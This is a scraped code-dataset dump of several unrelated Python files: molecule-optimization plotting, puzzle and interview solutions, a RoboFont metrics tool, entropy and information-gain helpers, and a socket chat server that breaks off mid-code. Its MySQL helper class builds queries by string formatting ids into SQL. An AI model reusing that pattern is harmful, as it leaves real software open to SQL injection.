cs.svg2pdf(bytestring=img.encode('utf-8'), write_to='qval_mat_20.pdf')\n\n\ndef plot_opt_path_20():\n highlightcolor = (0.98, 0.85, 0.37)\n\n smiles = [\n 'CN1C(=O)C2(OCCO2)c3ccccc13', 'C=C1COC2(O1)C(=O)N(C)c1ccccc12',\n 'C=C1COC2(O1)C(=O)N(CO)c1ccccc12', 'C=C1COC2(O1)C(=O)N(CO)c1c(C)cccc12',\n 'C=C1COC2(O1)C(=O)N(CO)c1c(CC)cccc12',\n 'C=C1COC2(O1)C(=O)N(CO)c1c(CCC)cccc12',\n 'C=C1COC2(O1)C(=O)N(CO)c1c(C(C)CC)cccc12',\n 'C=C1COC2(O1)C(=O)N(CO)c1c(C(C)C(C)C)cccc12'\n ]\n\n template1 = Chem.MolFromSmiles(smiles[0])\n AllChem.Compute2DCoords(template1, canonOrient=True)\n\n mols = [Chem.MolFromSmiles(smiles[0])]\n ha = [[]]\n hb = [[]]\n hac = [{}]\n hbc = [{}]\n prop = ['Step: 0, QED: %.4f' % QED.qed(mols[0])]\n N = len(smiles)\n for i in range(1, N):\n original_smiles = smiles[i - 1]\n original_state = Chem.MolFromSmiles(original_smiles)\n\n next_states = list(\n get_valid_actions(\n state=original_smiles,\n atom_types={'C', 'N', 'O'},\n allow_removal=True,\n allow_no_modification=True,\n allowed_ring_sizes={3, 5, 6},\n allow_bonds_between_rings=False))\n\n stated = {Chem.MolToSmiles(s): s for s in next_states}\n current_smiles = smiles[i]\n\n mol = stated[current_smiles]\n mols.append(mol)\n hla, hlb = highlights_diff(original_state, mol)\n ha.append(hla)\n hb.append(hlb)\n hac.append({a: highlightcolor for a in hla})\n hbc.append({b: highlightcolor for b in hlb})\n prop.append('Step: %i, QED: %.4f' % (i, QED.qed(mol)))\n\n for i in range(8):\n AllChem.GenerateDepictionMatching2DStructure(mols[i], template1)\n\n # img = Draw.MolsToGridImage(mols, molsPerRow=3,\n # subImgSize=(300, 150),\n # legends=prop,\n # highlightAtomLists=ha,\n # highlightBondLists=hb,\n # highlightAtomColors=hac,\n # highlightBondColors=hbc,\n # useSVG=True)\n\n drawer = rdMolDraw2D.MolDraw2DSVG(220 * 4, 160 * 2 + 20, 220, 160)\n drawer.SetFontSize(0.8) # <- default is 0.5, so this makes the font half\n drawer.drawOptions().legendFontSize = 18\n drawer.DrawMolecules(\n mols,\n legends=prop,\n highlightAtoms=ha,\n highlightBonds=hb,\n highlightAtomColors=hac,\n highlightBondColors=hbc)\n drawer.FinishDrawing()\n img = drawer.GetDrawingText()\n cs.svg2pdf(bytestring=img.encode('utf-8'), write_to='opt_path_20.pdf')\n\n\ndef plot_time_dependent_reward():\n with open('time_dependent.json') as f:\n all_qed = json.load(f)\n plt.figure()\n qed = all_qed['no_time']\n lq = len(qed)\n window = 200\n\n x = [j * window + 1 for j in range(lq // window - 1)]\n y = [\n np.mean(qed[window * j:window * (j + 1)]) for j in range(lq // window - 1)\n ]\n fit = interpolate.UnivariateSpline(\n x,\n y,\n k=3,\n )\n xx = np.linspace(0, 5000, 100)\n plt.plot(x, y, 'o', color='C0', alpha=0.2)\n plt.plot(xx, fit(xx), label='time-independent policy')\n\n qed = all_qed['with_time']\n lq = len(qed)\n window = 200\n x = [j * window + 1 for j in range(lq // window - 1)]\n y = [\n np.mean(qed[window * j:window * (j + 1)]) for j in range(lq // window - 1)\n ]\n fit = interpolate.UnivariateSpline(\n x,\n y,\n k=3,\n )\n xx = np.linspace(0, 5000, 100)\n plt.plot(x, y, 'o', color='C1', alpha=0.2)\n plt.plot(xx, fit(xx), label='time-dependent policy')\n\n plt.xlim(0, 4600)\n plt.ylim(0.2, 0.93)\n plt.xlabel('Number of epochs')\n plt.ylabel('Reward')\n plt.legend(loc='upper left')\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.92)\n plt.savefig('time_heterogeneous.pdf')\n plt.show()\n\n\ndef plot_episode_length():\n with open('episode_length.json') as f:\n length_list = json.load(f)\n plt.figure()\n plt.hist(\n length_list,\n bins=[9, 10, 
11, 12, 13, 14, 15, 16],\n edgecolor='black',\n linewidth=1.5)\n plt.xlabel('Number of steps before termination')\n plt.ylabel('Count')\n plt.title('Max Number of Steps: 20')\n\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.90)\n plt.savefig('episode_length.pdf')\n plt.show()\n\n\ndef plot_episode_length_qed():\n with open('episode_length_qed.json') as f:\n length_list = json.load(f)\n plt.figure()\n plt.hist(length_list, bins=40, edgecolor='black', linewidth=1.5)\n plt.xlim((-1, 42))\n plt.xlabel('Number of steps before termination')\n plt.ylabel('Count')\n plt.title('Max Number of Steps: 40')\n\n plt.subplots_adjust(left=0.16, bottom=0.16, right=0.92, top=0.90)\n plt.savefig('episode_length_qed.pdf')\n plt.show()\n\n\ndef multi_obj_gen_stat():\n with open('multi_objective_generation.json') as f:\n data = json.load(f)\n objs = [(2.2, 0.84), (2.5, 0.27), (3.8, 0.84), (4.8, 0.27)]\n for i in range(1, 5):\n tarSAS = objs[i - 1][0]\n tarQED = objs[i - 1][1]\n prop = list(zip(*data[str(i)]))\n prop = [list(set(pp)) for pp in prop]\n print('targetSAS=%.3f, generatedSAS:mean=%.3f, var=%.3f,'\n 'mean_absolute_difference=%.3f' %\n (tarSAS, np.mean(prop[0]), np.std(prop[0]),\n np.mean(np.abs(np.array(prop[0]) - tarSAS))))\n print('targetQED=%.3f, generatedQED:mean=%.3f, var=%.3f,'\n 'mean_absolute_difference=%.3f' %\n (tarQED, np.mean(prop[1]), np.std(prop[1]),\n np.mean(np.abs(np.array(prop[1]) - tarQED))))\n\n\ndef plot_multi_obj_opt_multi_plot(smiles, target_mol, idx=0):\n with open('all_molecules_with_id.json') as f:\n molid = json.load(f)\n colors = iter(cm.rainbow(np.linspace(0, 1, 6)))\n colors = iter(cm.Set2(np.linspace(0, 1, 8)))\n colors = sns.color_palette('husl', 6)\n colors = ['#eae471', '#c1e092', '#83b49d', '#448fad', '#3e60c3', '#5a26a6']\n smiles = tidy_smiles(smiles)\n # plt.figure()\n all_sim = []\n all_qed = []\n target_sim, target_qed = get_properties(target_mol, target_mol)\n for i in range(6):\n ssl = smiles['weight_%i' % i]\n sim, qed = zip(\n *[get_properties(ss, target_molecule=target_mol) for ss in ssl])\n all_sim += list(sim)\n all_qed += list(qed)\n\n fig, ax = plt.subplots(nrows=3, ncols=2, sharex=True, sharey=True)\n i = 0\n for row in ax:\n for col in row:\n ssl = smiles['weight_%i' % i]\n sim, qed = zip(\n *[get_properties(ss, target_molecule=target_mol) for ss in ssl])\n # col.scatter(all_sim, all_qed, color='#d4d4d4')\n col.scatter(sim, qed, label='w=%.1f' % (i * 0.2), color=colors[i])\n col.axvline(x=target_sim, ls='dashed', color='grey')\n col.axhline(y=target_qed, ls='dashed', color='grey')\n leg = col.legend(loc='lower left', handletextpad=0.0)\n leg.get_frame().set_alpha(0.75)\n col.set_ylim((-0.2, 1))\n col.set_xlim((-0.1, 1.1))\n i += 1\n fig.text(0.5, 0.02, 'Similarity', ha='center')\n fig.text(0.02, 0.5, 'QED', va='center', rotation='vertical')\n fig.text(0.5, 0.94, molid[target_mol], ha='center')\n plt.subplots_adjust(left=0.10, bottom=0.14, right=0.96, top=0.92, wspace=0.12)\n plt.savefig('batch/mult_obj_gen_{}.pdf'.format(idx))\n # plt.show()\n\n\ndef plot_target_sas():\n df = pd.read_csv('target_sas_results.csv')\n plt.figure(figsize=(5, 5))\n df25 = df[df['target_sas'] == 2.5]\n x25 = df25['original_sas']\n y25 = df25['sas']\n plt.scatter(x25, y25, label='target_sas=2.5')\n plt.axhline(y=2.5, ls='dashed', color='grey')\n\n df48 = df[df['target_sas'] == 4.8]\n x48 = df48['original_sas']\n y48 = df48['sas']\n plt.scatter(x48, y48, label='target_sas=4.8')\n plt.axhline(y=4.8, ls='dashed', color='grey')\n\n ax = plt.gca()\n 
ax.set_aspect('equal')\n plt.xlim(0.5, 5.5)\n plt.ylim(0.5, 5.5)\n plt.xticks([1, 2, 3, 4, 5])\n print('Target SAS 2.5')\n print(f'Mean: {np.mean(y25)}, Std: {np.std(y25)}')\n print('Target SAS 4.8')\n print(f'Mean: {np.mean(y48)}, Std: {np.std(y48)}')\n\n plt.subplots_adjust(left=0.13, bottom=0.14, right=0.96, top=0.92, wspace=0.12)\n plt.legend()\n plt.xlabel('SA score of the original molecules')\n plt.ylabel('SA score of the generated molecules')\n plt.savefig('target_sas.pdf')\n plt.show()\n\n\nplot_target_sas()\n# multi_obj_gen_stat()\n# plot_opt_path_20()\n# plot_qvals_with_change_20()\n# plot_multi_obj_gen_drug20()\n# plot_qed_relative_improvements()\n# plot_qed_improvements()\n# plot_drug20_smiles()\n# plot_max_qed_mols_2()\n# plot_max_logp_mols_2()\n# plot_noisy_qed_reward()\n# plot_final_vs_intermediate_reward()\n# plot_episode_length_qed()\n# plot_episode_length()\n","repo_name":"google-research/google-research","sub_path":"mol_dqn/plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":35005,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"43181647322","text":"T = int(input())\n\ndef secondCheck(word,left,right):\n while (left < right):\n if (word[left] == word[right]):\n left += 1\n right -= 1\n else:\n return False\n return True\n\n\ndef firstCheck(word,left,right):\n while (left < right):\n if (word[left] == word[right]):\n left += 1\n right -= 1\n else:\n check1 = secondCheck(word,left+1,right)\n check2 = secondCheck(word,left,right-1)\n if(check1 or check2):\n return 1\n else:\n return 2\n return 0\n\nfor _ in range(T):\n word = list(input())\n left=0\n right=len(word)-1\n ans = firstCheck(word,left,right)\n print(ans)","repo_name":"cheonsol-lee/algorithm","sub_path":"백준/17609(회문).py","file_name":"17609(회문).py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"33465942988","text":"import db.mysql as mysql_db\nimport pymysql\n\n\nclass CommonModel:\n def __init__(self):\n self.tableName = ''\n\n def query(self, sql):\n rows = mysql_db.query(sql)\n if rows == None or len(rows) == 0:\n return []\n return rows\n\n def escapeString(self, string):\n return pymysql.escape_string(string)\n\n def update(self, sql):\n return mysql_db.update(sql)\n\n def load(self, id):\n sql = \"select * from %s where id=%s\" % (self.tableName, id)\n rows = self.query(sql)\n if rows == None or len(rows) == 0:\n return None\n row = rows[0]\n return row\n\n def delete(self, id):\n sql = \"delete from %s where id=%s\" % (self.tableName, id)\n return self.update(sql)\n\n def rows(self):\n sql = \"select * from %s\" % self.tableName\n items = self.query(sql)\n if items == None or len(items) == 0:\n return []\n return items\n\n def isColumnExists(self, where):\n sql = \"select count(*) as cnt from %s %s\" % (self.tableName, where)\n rows = self.query(sql)\n if rows == None or len(rows) == 0:\n return False\n row = rows[0]\n cnt = row['cnt']\n if cnt <= 0:\n return False\n else:\n return True\n\n def lastrowid(self):\n return mysql_db.lastrowid()\n\n def getVariMapByVariList(self, l):\n '''\n 将列表中的多个变量组成一个字典\n '''\n m = {}\n for item in l:\n key = item['key']\n value = item['value']\n m[key] = value\n return m\n\n def jd(self, string, jdaLength=10):\n length = len(string)\n if length <= jdaLength:\n return string\n jd_str = string[0:jdaLength]\n return jd_str + 
'...'","repo_name":"zyxyuanxiao/hotpot","sub_path":"model/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10684553541","text":"class Solution:\n def getOrder(self, tasks: List[List[int]]) -> List[int]:\n for i in range(len(tasks)):\n tasks[i]=[tasks[i][0],tasks[i][1],i]\n tasks.sort(key=lambda x:x[0])\n res=[]\n time=tasks[0][0]\n min_heap=[]\n i=0\n while min_heap or i=tasks[i][0]:\n heapq.heappush(min_heap,[tasks[i][1],tasks[i][2]])\n i+=1\n if not min_heap:\n time=tasks[i][0]\n else:\n procTime,index=heapq.heappop(min_heap)\n time+=procTime\n res.append(index)\n return res\n ","repo_name":"HenokMekuanint/Competitiveprogramming","sub_path":"1834-single-threaded-cpu/1834-single-threaded-cpu.py","file_name":"1834-single-threaded-cpu.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"5962019154","text":"# -*- coding: UTF-8 -*-\n#\n# ----------------------------------------------------------------------------------\nfrom vanilla import *\nfrom defconAppKit.windows.baseWindow import BaseWindowController\nfrom AppKit import *\nimport os.path\nfrom mojo.roboFont import version\n\ndef sortFonts(fonts):\n \"\"\"\n Some day I will implement this.\n \"\"\"\n return fonts\n\n # ---------------------------------------------------------------------------------------------------------\n # A D J U S T M E T R I C S\n #\n # Adjust metrics.\n #\n \"\"\"\n\n Adjust both margins, left margin, or right margin\n To current glyph selection or all glyphs\n In current font or a selection of opened fonts\n\n Options:\n\n Adjust components (on by default): If 'A' is selected but not 'Aacute', 'Aacute' will be shifted back so it does not affect the original position.\n\n Adjust Comps with Selected (off by default): If 'A' is selected, also transform 'Aacute' et. 
al.\n\n \"\"\"\n\ndef addMargins(f, gnames=[], leftUnits=0, rightUnits=0, adjustComponents=True):\n for gname in gnames:\n if gname in f:\n g = f[gname]\n g.prepareUndo('addMargins')\n # do left side\n if leftUnits != 0:\n # RF3\n if version >= \"3.0\":\n if g.bounds:\n g.leftMargin += leftUnits\n else:\n g.width += leftUnits\n # RF1\n else:\n if g.box:\n g.leftMargin += leftUnits\n else:\n g.width += leftUnits\n\n if adjustComponents:\n for comp in g.components:\n if comp.baseGlyph in gnames:\n comp.offset = (comp.offset[0]-leftUnits, comp.offset[1])\n #print('adjusting', g, 'leftMargin by', leftUnits, 'units')\n if rightUnits != 0:\n # RF3\n if version >= \"3.0\":\n if g.bounds:\n g.rightMargin += rightUnits\n else:\n g.width += rightUnits\n # RF1\n else:\n if g.box:\n g.rightMargin += rightUnits\n else:\n g.width += rightUnits\n g.performUndo()\n\ndef multiplyMargins(f, gnames, leftMultiplier=1, rightMultiplier=1, roundValues=1, adjustComponents=True):\n marginRecords = {}\n # Step 1: Compile records\n for gname in gnames:\n leftUnits, rightUnits = 0, 0\n if gname in f:\n g = f[gname]\n if leftMultiplier != 1:\n leftUnits = (leftMultiplier * g.leftMargin) - g.leftMargin\n if rightMultiplier != 1:\n rightUnits = (rightMultiplier * g.rightMargin ) - g.rightMargin\n if roundValues != 0:\n leftUnits = round(leftUnits, roundValues)\n rightUnits = round(rightUnits, roundValues)\n marginRecords[g.name] = leftUnits, rightUnits\n # Make changes\n for gname in gnames:\n if gname in f:\n g = f[gname]\n g.prepareUndo('multiplyMargins')\n leftUnits, rightUnits = marginRecords[gname]\n g.leftMargin += leftUnits\n g.rightMargin += rightUnits\n if adjustComponents:\n for comp in g.components:\n if comp.baseGlyph in gnames:\n compLeftUnits, compRightUnits = marginRecords[comp.baseGlyph]\n comp.offset = (comp.offset[0]-compLeftUnits, comp.offset[1])\n g.performUndo()\n\nclass AdjustMetrics(BaseWindowController):\n\n WINDOWTITLE = u'Adjust Metrics'\n\n def __init__(self):\n\n #layout variables\n width = 250\n height = 500\n x = 20\n y = 20\n rightMargin = -20\n itemHeight = 22\n lineHeight = 25\n\n fonts = AllFonts()\n self.fonts = sortFonts(fonts)\n current = CurrentFont()\n\n # Window\n\n self.w = FloatingWindow((width, height), self.WINDOWTITLE, autosaveName=self.WINDOWTITLE, minSize=(width, height))\n\n # Adjust Both\n self.w.adjustBothText = TextBox((x, y, rightMargin, itemHeight), 'Adjust Both Margins')\n y+=lineHeight\n self.w.adjustBothValue = EditText((x, y, 50, itemHeight), callback=self.adjustBothValueCallback)\n x+=60\n self.w.adjustBothUnit = RadioGroup((x, y, 120, itemHeight*2), ['Units', 'Percent'], callback=self.adjustBothUnitCallback)\n self.w.adjustBothUnit.set(0)\n x = 20\n y += lineHeight * 2.5\n\n # Adjust Left\n self.w.adjustLeftText = TextBox((x, y, rightMargin, itemHeight), 'Adjust Left Margin')\n y+=lineHeight\n self.w.adjustLeftValue = EditText((x, y, 50, itemHeight), callback=self.clearBothCallback)\n x+=60\n self.w.adjustLeftUnit = RadioGroup((x, y, 120, itemHeight*2), ['Units', 'Percent'], callback=self.clearBothCallback)\n self.w.adjustLeftUnit.set(0)\n x = 20\n y += lineHeight * 2.5\n\n # Adjust Right\n self.w.adjustRightText = TextBox((x, y, rightMargin, itemHeight), 'Adjust Right Margin')\n y+=lineHeight\n self.w.adjustRightValue = EditText((x, y, 50, itemHeight), callback=self.clearBothCallback)\n x+=60\n self.w.adjustRightUnit = RadioGroup((x, y-3, 120, itemHeight*2), ['Units', 'Percent'], callback=self.clearBothCallback)\n self.w.adjustRightUnit.set(0)\n x = 20\n y += 
lineHeight * 2.5\n\n # Glyph Selection\n self.w.glyphSelection = RadioGroup((x, y, rightMargin, itemHeight*2), ['Current Glyph Selection', 'All Glyphs'])\n self.w.glyphSelection.set(0)\n\n y += lineHeight * 2.5\n\n # Components\n self.w.adjustComponents = CheckBox((x, y, rightMargin, itemHeight), 'Adjust Components')\n self.w.adjustComponents.set(1)\n\n y += lineHeight\n\n # Transform\n self.w.adjustBaseComponents = CheckBox((x, y, rightMargin, itemHeight), 'Adjust Comps with Selected')\n self.w.adjustBaseComponents.set(0)\n\n y += lineHeight\n\n # Transform\n self.w.ignoreZeroWidth = CheckBox((x, y, rightMargin, itemHeight), 'Ignore Zero-Width Glyphs')\n self.w.ignoreZeroWidth.set(1)\n\n self.w.apply = Button((x, -40, 100, itemHeight), 'Apply', callback=self.apply)\n self.w.cancel = Button((x+110, -40, 100, itemHeight), 'Close', callback=self.cancel)\n\n # Font Selection Drawer\n\n self.fs = Drawer((200, 150), self.w)\n fsx = 5\n fsy = 5\n\n self.fs.selectAllFonts = Button((fsx, fsy, -55, itemHeight), 'Select All Fonts', callback=self.selectAllFonts, sizeStyle='small')\n self.fs.refreshFontList = Button((-35, fsy, 30, 22), u'↺', callback=self.refreshFontList)\n\n fsy += 25\n self.fs.deselectAllFonts = Button((fsx, fsy, -55, itemHeight), 'Deselect All Fonts', callback=self.deselectAllFonts, sizeStyle='small')\n fsy += 25\n self.fs.selectCurrentFont = Button((fsx, fsy, -55, itemHeight), 'Select Current Font', callback=self.selectCurrentFont, sizeStyle='small')\n fsy += 25\n\n fontNameList = []\n currentIndex = None\n for x, f in enumerate(self.fonts):\n fontName = str(f.info.familyName)+' '+str(f.info.styleName)\n if fontName in fontNameList:\n fontName = f.path\n fontNameList.append(fontName)\n if f == CurrentFont():\n currentIndex = x\n fsy += 5\n self.fs.fontSelect = List((fsx, fsy, -5, -5), fontNameList)\n if currentIndex is not None:\n self.fs.fontSelect.setSelection([currentIndex])\n\n self.w.open()\n self.fs.open()\n\n def refreshFontList(self, sender):\n self.fonts = sortFonts(AllFonts())\n fontNameList = []\n currentIndex = None\n for x, f in enumerate(self.fonts):\n fontName = str(f.info.familyName)+' '+str(f.info.styleName)\n if fontName in fontNameList:\n fontName = f.path\n fontNameList.append(fontName)\n if f == CurrentFont():\n currentIndex = x\n self.fs.fontSelect.set(fontNameList)\n self.fs.fontSelect.setSelection([currentIndex])\n\n def adjustBothUnitCallback(self, sender):\n self.w.adjustLeftUnit.set(sender.get())\n self.w.adjustRightUnit.set(sender.get())\n\n def adjustBothValueCallback(self, sender):\n self.w.adjustLeftValue.set(sender.get())\n self.w.adjustRightValue.set(sender.get())\n\n def clearBothCallback(self, sender):\n self.w.adjustBothValue.set('')\n\n def selectAllFonts(self, sender):\n indexRange = range(0, len(self.fonts))\n self.fs.fontSelect.setSelection(indexRange)\n\n def deselectAllFonts(self, sender):\n self.fs.fontSelect.setSelection([])\n\n def selectCurrentFont(self, sender):\n for x, f in enumerate(self.fonts):\n if f == CurrentFont():\n currentIndex = x\n self.fs.fontSelect.setSelection([currentIndex])\n\n def getSelectedFonts(self):\n selectedFonts = []\n for index in self.fs.fontSelect.getSelection():\n selectedFonts.append(self.fonts[index])\n return selectedFonts\n\n def makeMetricsAdjustment(self, f, gnames):\n \"\"\"\n \"\"\"\n if self.w.ignoreZeroWidth.get():\n newGnames = []\n for gname in gnames:\n if f[gname].width != 0:\n newGnames.append(gname)\n gnames = newGnames\n\n if self.w.adjustComponents.get():\n adjustComponents = True\n 
else:\n adjustComponents = False\n # get values\n adjustLeftUnit = self.w.adjustLeftUnit.get()\n adjustRightUnit = self.w.adjustRightUnit.get()\n\n try:\n leftValue = int(self.w.adjustLeftValue.get())\n except:\n if adjustLeftUnit == 0:\n leftValue = 0\n else:\n leftValue = 1\n try:\n rightValue = int(self.w.adjustRightValue.get())\n except:\n if adjustRightUnit == 0:\n rightValue = 0\n else:\n rightValue = 1\n\n if adjustLeftUnit == 0:\n if adjustRightUnit == 0:\n addMargins(f, gnames, leftValue, rightValue, adjustComponents=adjustComponents)\n else:\n addMargins(f, gnames, leftValue, 0, adjustComponents=adjustComponents)\n multiplyMargins(f, gnames, 1, rightValue*.01, adjustComponents=adjustComponents)\n if adjustLeftUnit == 1:\n if adjustRightUnit == 1:\n multiplyMargins(f, gnames, leftValue*.01, rightValue*.01, adjustComponents=adjustComponents)\n else:\n multiplyMargins(f, gnames, leftValue*.01, 1, adjustComponents=adjustComponents)\n addMargins(f, gnames, 0, rightValue, adjustComponents=adjustComponents)\n\n # RF3\n if version >= \"3.0\":\n f.changed()\n # RF1\n else:\n f.update()\n\n def apply(self, sender):\n\n fonts = self.getSelectedFonts()\n\n for f in fonts:\n\n if self.w.glyphSelection.get() == 0:\n gnames = CurrentFont().selectedGlyphNames\n else:\n gnames = f.keys()\n\n\n if self.w.adjustBaseComponents.get():\n additionalGnames = []\n for g in f:\n if len(g.components) >= 1 and ( g.components[0].baseGlyph in gnames ) and ( g.name not in gnames ):\n additionalGnames.append(g.name)\n gnames += additionalGnames\n\n print(f, gnames)\n self.makeMetricsAdjustment(f, gnames)\n\n def cancel(self, sender):\n self.w.close()\n\nOpenWindow(AdjustMetrics)\n\n","repo_name":"FontBureau/fbOpenTools","sub_path":"AdjustMetrics/AdjustMetrics.roboFontExt/lib/adjustMetrics.py","file_name":"adjustMetrics.py","file_ext":"py","file_size_in_byte":11998,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"99"} +{"seq_id":"38271049636","text":"#!/usr/bin/env python3\nfrom math import log2\n\nglobal FeatureList, FeatureValues, Data\nFeatureList = ['Deadline', 'Party', 'Lazy']\nFeatureValues = {'Deadline': ['None', 'Near', 'Urgent'], 'Party': ['No', 'Yes'], 'Lazy': ['No', 'Yes'], 'Ans': ['Party', 'Study', 'Pub', 'TV']}\nData = [{'Deadline': 'Urgent', 'Party': 'Yes', 'Lazy': 'Yes', 'Ans': 'Party'}, {'Deadline': 'Urgent', 'Party': 'No', 'Lazy': 'Yes', 'Ans': 'Study'}, {'Deadline': 'Near', 'Party': 'Yes', 'Lazy': 'Yes', 'Ans': 'Party'}, {'Deadline': 'None', 'Party': 'Yes', 'Lazy': 'No', 'Ans': 'Party'}, {'Deadline': 'None', 'Party': 'No', 'Lazy': 'Yes', 'Ans': 'Pub'}, {'Deadline': 'None', 'Party': 'Yes', 'Lazy': 'No', 'Ans': 'Party'}, {'Deadline': 'Near', 'Party': 'No', 'Lazy': 'No', 'Ans': 'Study'}, {'Deadline': 'Near', 'Party': 'No', 'Lazy': 'Yes', 'Ans': 'TV'}, {'Deadline': 'Near', 'Party': 'Yes', 'Lazy': 'Yes', 'Ans': 'Party'}, {'Deadline': 'Urgent', 'Party': 'No', 'Lazy': 'No', 'Ans': 'Study'}]\n\n# list of the items in data that have feature equal to value\ndef select(data, feature, value) :\n return [ item for item in data if item[feature]==value ]\n\n\n# count how many items in the data have feature equal to value\ndef count(data, feature, value) :\n num = 0\n for d in data :\n if d[feature]==value : num+=1\n return num\n\n\n# what is the entropy of a question about feature?\n# sum the entropy over the possible values of the feature.\ndef entropy(data, feature) :\n result = 0\n for f in FeatureValues[feature]:\n p = len(select(data, feature, f)) / 
len(data)\n result += calc_entropy(p)\n return result\n\ndef calc_entropy(p):\n if p != 0:\n return -p * log2(p)\n else:\n return 0\n\n# current entropy - expected entropy after getting info about feature\n# entropy(data, \"Ans\") - sum_{v=featurevalues} p_v * entropy(select(data, feature, v), \"Ans\")\ndef gain(data, feature) :\n Entropy_S = entropy(data, 'Ans')\n\n for val in FeatureValues[feature]:\n p = count(data, feature, val) / len(data)\n subset = select(data, feature, val)\n print(Entropy_S, entropy(subset, 'Ans'))\n Entropy_S -= p * entropy(subset, 'Ans')\n return Entropy_S\n","repo_name":"idahood/CS575","sub_path":"assign2/entropy_gain.py","file_name":"entropy_gain.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73814962886","text":"class Solution:\n\tdef anagrams(self, A):\n\t\ttable = {}\n\t\tfor idx, val in enumerate(A):\n\t\t\tkey = 1\n\t\t\tfor j in val:\n\t\t\t\tkey *= ord(j)\n\t\t\tif table.get(key, None) != None:\n \ttable[key].append(idx + 1)\n\t\t\telse:\n\t\t\t\ttable[key] = []\n\t\t\t\ttable[key].append(idx + 1)\n\t\tans = []\n\t\tfor j, i in table.items():\n\t\t\tans.append(i)\n\t\treturn ans\n \t\t\t\n\t\t\t\t\n\n\n\n\nsol = Solution()\nA = ['cat', 'dog', 'god', 'tca']\nprint(sol.anagrams(A))\n","repo_name":"Ken1g/InterviewBit","sub_path":"Tasks/Hash/anagrams.py","file_name":"anagrams.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29169396950","text":"import socket\nimport sys\nimport select\nimport struct\nimport queue\nimport time\n\nclass chat_server:\n\tdef __init__(self,port,verbose=False):\n\t\tself.waiting_for_accept = [] #contain user ids waiting for ok\n\t\tself.user_count = 0\n\t\tself.PORT = port\n\t\tself.next_id = 1\n\t\tself.SERVER_ID = 65535\n\t\tself.verbose=verbose\n\t\t#socket - id map\n\t\t# {'sock':, 'id':int}\n\t\tself.mapping = []\n\t\t#ids avaible for reallocating\n\t\tself.freed_ids = []\n\t\t#list waiting for msg confirmations\n\t\t#{'type':int with message type,'seq':sequence number of msg}]\n\t\tself.wait_confirmation = []\n\n\tdef allocate_id(self):\n\t\tif not self.freed_ids:\n\t\t\tnext_id = self.next_id\n\t\t\tself.next_id += 1\n\t\t\tself.waiting_for_accept.append(next_id)\n\t\t\tif self.next_id > self.SERVER_ID:\n\t\t\t\tnext_id = -1\n\t\t\treturn next_id\n\t\telse:\n\t\t\treturn self.freed_ids.pop()\n\tdef create_message(self,msg,msgtype,destination,seq):\n\t\t'''\n\t\tHeader (in bytes):\n\t\t[MSG TYPE] [ORIGIN ID] [DESTINATION ID] [SEQ_NUM]\n\t\t0 1 2 3 4\t\t\t 5 6 8\n\t\tMSG TYPES:\n\t\t|1 OK\t: Accepted msgs |5 MSG* : Actual chat msgs |\n\t\t|\t\t sends ok |\t\t have msg size in |\n\t\t|2 ERRO\t: Refused msgs |\t\t header + msg bytes |\n\t\t|\t\t sends erro\t|6 CREQ : Ask for clients |\n\t\t|3 OI\t: Joining client|\t\t server sends clist |\n\t\t|\t\t sends oi |7 CLIST : number n of clients|\n\t\t|4 FLW\t: Leaving client| in header + n |\n\t\t|\t\t sends flw |\t\t clients numbers |\n\n\t\t* MSG size are 2 bytes, length guaranteed to be < 400 chars\n\t\t** When client gets answered from msg type 3 it receives\n\t\tat destination id his allocated id\n\t\t'''\n\t\tframe = bytes()\n\t\tframe += struct.pack('!H',msgtype)\n\t\tframe += struct.pack('!H',self.SERVER_ID)\n\t\tframe += struct.pack('!H',destination)\n\t\tframe += struct.pack('!H',seq)\n\t\tif msgtype == 5:\n\t\t\tmsg_len = len(msg)\n\t\t\tframe += 
struct.pack('!H',msg_len)\n\t\t\tframe += msg.encode()\t\n\t\tif msgtype == 7:\n\t\t\tframe += struct.pack('!H',self.user_count)\n\t\t\tfor i in self.mapping:\n\t\t\t\tid_int = i['id']\n\t\t\t\tif id_int != self.SERVER_ID:\n\t\t\t\t\tframe += struct.pack('!H',id_int)\n\t\treturn frame\n\n\tdef receive_message(self,sock):\n\t\t#retrieve socket id for verbose printing\n\t\tfor i in self.mapping:\n\t\t\tif sock == i['sock']:\n\t\t\t\tsock_id = i['id']\n\t\t#receive bytes from socket\n\t\tmsg_type = sock.recv(2)\n\t\tif not msg_type: return\n\t\torigin = sock.recv(2)\n\t\tdestination = sock.recv(2)\n\t\tseq_num = sock.recv(2)\n\t\t#convertion from bytes to unsigned shorts\n\t\torig_int = struct.unpack('!H',origin)[0]\n\t\tseq_int = struct.unpack('!H',seq_num)[0]\n\t\tdest_int = struct.unpack('!H',destination)[0]\n\t\tmsg_int_type = struct.unpack('!H',msg_type)[0]\n\t\t#appending packet for verbose printing or forwading msg\n\t\tpacket = bytes()\n\t\tpacket += msg_type + origin + destination + seq_num\n\t\t#treats \"OK\" messages\n\t\tif msg_int_type == 1:\n\t\t\tfor i in self.wait_confirmation[:]:\n\t\t\t\tif seq_int == i['seq']:\n\t\t\t\t\tself.wait_confirmation.remove(i)\n\t\t\t\tsock.settimeout(0.0)\n\t\t#treats \"OI\" messages\n\t\telif msg_int_type == 3:\n\t\t\tnew_id = self.allocate_id()\n\t\t\tfor i in self.mapping:\n\t\t\t\tif sock is i['sock']:\n\t\t\t\t\ti['id'] = new_id\n\t\t\tself.user_count += 1\n\t\t\tid_alloc_frame = self.create_message('',1,new_id,seq_int)\n\t\t\tself.message_queues[sock].put(id_alloc_frame)\n\t\t\tif sock not in 